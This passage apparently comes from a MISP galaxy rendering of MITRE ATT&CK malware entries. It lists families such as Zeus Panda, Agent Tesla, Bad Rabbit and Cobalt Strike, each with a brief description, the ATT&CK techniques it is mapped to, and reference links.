Table 4599. Table References
Links
https://attack.mitre.org/software/S0130
https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf

Cherry Picker - S0107

[Cherry Picker](https://attack.mitre.org/software/S0107) is a point of sale (PoS) memory scraper. (Citation: Trustwave Cherry Picker)

The tag is: misp-galaxy:mitre-malware="Cherry Picker - S0107"

Cherry Picker - S0107 is also known as:

Cherry Picker

View relationships graph

Cherry Picker - S0107 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol - T1048.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="AppInit DLLs - T1546.010" with estimative-language:likelihood-probability="almost-certain"

Table 4600. Table References
Links
https://attack.mitre.org/software/S0107
https://www.trustwave.com/Resources/SpiderLabs-Blog/Shining-the-Spotlight-on-Cherry-Picker-PoS-Malware/

Zeus Panda - S0330

[Zeus Panda](https://attack.mitre.org/software/S0330) is a Trojan designed to steal banking information and other sensitive credentials for exfiltration. [Zeus Panda](https://attack.mitre.org/software/S0330)’s original source code was leaked in 2011, allowing threat actors to use its source code as a basis for new malware variants. It is mainly used to target Windows operating systems ranging from Windows XP through Windows 10.(Citation: Talos Zeus Panda Nov 2017)(Citation: GDATA Zeus Panda June 2017)

The tag is: misp-galaxy:mitre-malware="Zeus Panda - S0330"

Zeus Panda - S0330 is also known as:

Zeus Panda

View relationships graph

Zeus Panda - S0330 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Portable Executable Injection - T1055.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credential API Hooking - T1056.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Clipboard Data - T1115" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Language Discovery - T1614.001" with estimative-language:likelihood-probability="almost-certain"

Table 4601. Table References
Links
https://attack.mitre.org/software/S0330
https://blog.talosintelligence.com/2017/11/zeus-panda-campaign.html#More
https://cyberwtf.files.wordpress.com/2017/07/panda-whitepaper.pdf

SpyNote RAT - S0305

[SpyNote RAT](https://attack.mitre.org/software/S0305) (Remote Access Trojan) is a family of malicious Android apps. The [SpyNote RAT](https://attack.mitre.org/software/S0305) builder tool can be used to develop malicious apps with the malware’s functionality. (Citation: Zscaler-SpyNote)

The tag is: misp-galaxy:mitre-malware="SpyNote RAT - S0305"

SpyNote RAT - S0305 is also known as:

SpyNote RAT

View relationships graph

SpyNote RAT - S0305 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Location Tracking - T1430" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Broadcast Receivers - T1402" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture Audio - T1429" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture SMS Messages - T1412" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1533" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Contact List - T1432" with estimative-language:likelihood-probability="almost-certain"

Table 4602. Table References
Links
https://attack.mitre.org/software/S0305
https://www.zscaler.com/blogs/research/spynote-rat-posing-netflix-app

3PARA RAT - S0066

[3PARA RAT](https://attack.mitre.org/software/S0066) is a remote access tool (RAT) programmed in C++ that has been used by [Putter Panda](https://attack.mitre.org/groups/G0024). (Citation: CrowdStrike Putter Panda)

The tag is: misp-galaxy:mitre-malware="3PARA RAT - S0066"

3PARA RAT - S0066 is also known as:

3PARA RAT

View relationships graph

3PARA RAT - S0066 has relationships with:

similar: misp-galaxy:rat="3PARA RAT" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Timestomp - T1070.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"

Table 4603. Table References
Links
https://attack.mitre.org/software/S0066
http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf

Agent Smith - S0440

[Agent Smith](https://attack.mitre.org/software/S0440) is mobile malware that generates financial gain by replacing legitimate applications on devices with malicious versions that include fraudulent ads. As of July 2019 [Agent Smith](https://attack.mitre.org/software/S0440) had infected around 25 million devices, primarily targeting India though effects had been observed in other Asian countries as well as Saudi Arabia, the United Kingdom, and the United States.(Citation: CheckPoint Agent Smith)

The tag is: misp-galaxy:mitre-malware="Agent Smith - S0440"

Agent Smith - S0440 is also known as:

Agent Smith

View relationships graph

Agent Smith - S0440 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Exploit OS Vulnerability - T1404" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Generate Fraudulent Advertising Revenue - T1472" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Delete Device Data - T1447" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Suppress Application Icon - T1508" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerade as Legitimate Application - T1444" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Compromise Application Executable - T1577" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1406" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Application Discovery - T1418" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1424" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Other Means - T1476" with estimative-language:likelihood-probability="almost-certain"

Table 4604. Table References
Links
https://attack.mitre.org/software/S0440
https://research.checkpoint.com/2019/agent-smith-a-new-species-of-mobile-malware/

4H RAT - S0065

[4H RAT](https://attack.mitre.org/software/S0065) is malware that has been used by [Putter Panda](https://attack.mitre.org/groups/G0024) since at least 2007. (Citation: CrowdStrike Putter Panda)

The tag is: misp-galaxy:mitre-malware="4H RAT - S0065"

4H RAT - S0065 is also known as:

4H RAT

View relationships graph

4H RAT - S0065 has relationships with:

similar: misp-galaxy:rat="4H RAT" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

Table 4605. Table References
Links
https://attack.mitre.org/software/S0065
http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf

Desert Scorpion - S0505

[Desert Scorpion](https://attack.mitre.org/software/S0505) is surveillanceware that has targeted the Middle East, specifically individuals located in Palestine. [Desert Scorpion](https://attack.mitre.org/software/S0505) is suspected to have been operated by the threat actor APT-C-23.(Citation: Lookout Desert Scorpion)

The tag is: misp-galaxy:mitre-malware="Desert Scorpion - S0505"

Desert Scorpion - S0505 is also known as:

Desert Scorpion

View relationships graph

Desert Scorpion - S0505 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Authorized App Store - T1475" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Application Discovery - T1418" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1426" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Location Tracking - T1430" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1533" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture SMS Messages - T1412" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Alternate Network Mediums - T1438" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture Camera - T1512" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Stored Application Data - T1409" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture Audio - T1429" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Delete Device Data - T1447" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data Encrypted - T1532" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Install Insecure or Malicious Configuration - T1478" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1420" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Suppress Application Icon - T1508" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Contact List - T1432" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Download New Code at Runtime - T1407" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="SMS Control - T1582" with estimative-language:likelihood-probability="almost-certain"

Table 4606. Table References
Links
https://attack.mitre.org/software/S0505
https://blog.lookout.com/desert-scorpion-google-play

Net Crawler - S0056

[Net Crawler](https://attack.mitre.org/software/S0056) is an intranet worm capable of extracting credentials using credential dumpers and spreading to systems on a network over SMB by brute forcing accounts with recovered passwords and using [PsExec](https://attack.mitre.org/software/S0029) to execute a copy of [Net Crawler](https://attack.mitre.org/software/S0056). (Citation: Cylance Cleaver)

The tag is: misp-galaxy:mitre-malware="Net Crawler - S0056"

Net Crawler - S0056 is also known as:

Net Crawler
NetC

View relationships graph

Net Crawler - S0056 has relationships with:

similar: misp-galaxy:malpedia="NetC" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Password Cracking - T1110.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"

Table 4607. Table References
Links
https://attack.mitre.org/software/S0056
https://web.archive.org/web/20200302085133/https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf

Bad Rabbit - S0606

[Bad Rabbit](https://attack.mitre.org/software/S0606) is a self-propagating ransomware that affected the Ukrainian transportation sector in 2017. [Bad Rabbit](https://attack.mitre.org/software/S0606) has also targeted organizations and consumers in Russia. (Citation: Secure List Bad Rabbit)(Citation: ESET Bad Rabbit)(Citation: Dragos IT ICS Ransomware)

The tag is: misp-galaxy:mitre-malware="Bad Rabbit - S0606"

Bad Rabbit - S0606 is also known as:

Bad Rabbit
Win32/Diskcoder.D

View relationships graph

Bad Rabbit - S0606 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Firmware Corruption - T1495" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Password Spraying - T1110.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploitation of Remote Services - T1210" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1189" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 4608. Table References
Links
https://attack.mitre.org/software/S0606
https://securelist.com/bad-rabbit-ransomware/82851/
https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/
https://www.dragos.com/blog/industry-news/implications-of-it-ransomware-for-ics-environments/

AutoIt backdoor - S0129

[AutoIt backdoor](https://attack.mitre.org/software/S0129) is malware that has been used by the actors responsible for the MONSOON campaign. The actors frequently used it in weaponized .pps files exploiting CVE-2014-6352. (Citation: Forcepoint Monsoon) This malware makes use of the legitimate scripting language for Windows GUI automation with the same name.

The tag is: misp-galaxy:mitre-malware="AutoIt backdoor - S0129"

AutoIt backdoor - S0129 is also known as:

AutoIt backdoor

View relationships graph

AutoIt backdoor - S0129 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

Table 4609. Table References
Links
https://attack.mitre.org/software/S0129
https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf

Agent Tesla - S0331

[Agent Tesla](https://attack.mitre.org/software/S0331) is a spyware Trojan written for the .NET framework that has been observed since at least 2014.(Citation: Fortinet Agent Tesla April 2018)(Citation: Bitdefender Agent Tesla April 2020)(Citation: Malwarebytes Agent Tesla April 2020)

The tag is: misp-galaxy:mitre-malware="Agent Tesla - S0331"

Agent Tesla - S0331 is also known as:

Agent Tesla

View relationships graph

Agent Tesla - S0331 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Clipboard Data - T1115" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Uncommonly Used Port - T1065" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol - T1048.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive Collected Data - T1560" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Video Capture - T1125" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Mail Protocols - T1071.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Password Stores - T1555" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Hidden Window - T1564.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Virtualization/Sandbox Evasion - T1497" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Browser Session Hijacking - T1185" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials in Registry - T1552.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Hollowing - T1055.012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Regsvcs/Regasm - T1218.009" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"

Table 4610. Table References
Links
https://attack.mitre.org/software/S0331
https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.html
https://labs.bitdefender.com/2020/04/oil-gas-spearphishing-campaigns-drop-agent-tesla-spyware-in-advance-of-historic-opec-deal/
https://blog.malwarebytes.com/threat-analysis/2020/04/new-agenttesla-variant-steals-wifi-credentials/
https://blog.talosintelligence.com/2018/10/old-dog-new-tricks-analysing-new-rtf_15.html
https://www.digitrustgroup.com/agent-tesla-keylogger/

Cobalt Strike - S0154

[Cobalt Strike](https://attack.mitre.org/software/S0154) is a commercial, full-featured, remote access tool that bills itself as “adversary simulation software designed to execute targeted attacks and emulate the post-exploitation actions of advanced threat actors”. Cobalt Strike’s interactive post-exploit capabilities cover the full range of ATT&CK tactics, all executed within a single, integrated system.(Citation: cobaltstrike manual)

In addition to its own capabilities, [Cobalt Strike](https://attack.mitre.org/software/S0154) leverages the capabilities of other well-known tools such as Metasploit and [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: cobaltstrike manual)

The tag is: misp-galaxy:mitre-malware="Cobalt Strike - S0154"

Cobalt Strike - S0154 is also known as:

Cobalt Strike

View relationships graph

Cobalt Strike - S0154 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Transfer - T1029" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Timestomp - T1070.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Multiband Communication - T1026" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Service Scanning - T1046" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Pass the Hash - T1550.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Indicator Removal from Tools - T1027.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Remote Management - T1021.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Accounts - T1078.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="SSH - T1021.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Internal Proxy - T1090.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Token Impersonation/Theft - T1134.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Protocol Tunneling - T1572" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Browser Session Hijacking - T1185" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Account Manager - T1003.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Distributed Component Object Model - T1021.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Application Layer Protocol - T1071" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DNS - T1071.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Accounts - T1078.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Hollowing - T1055.012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="BITS Jobs - T1197" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Parent PID Spoofing - T1134.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Python - T1059.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Make and Impersonate Token - T1134.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Non-Application Layer Protocol - T1095" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Code Signing - T1553.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Asymmetric Cryptography - T1573.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Office Template Macros - T1137.001" with estimative-language:likelihood-probability="almost-certain"
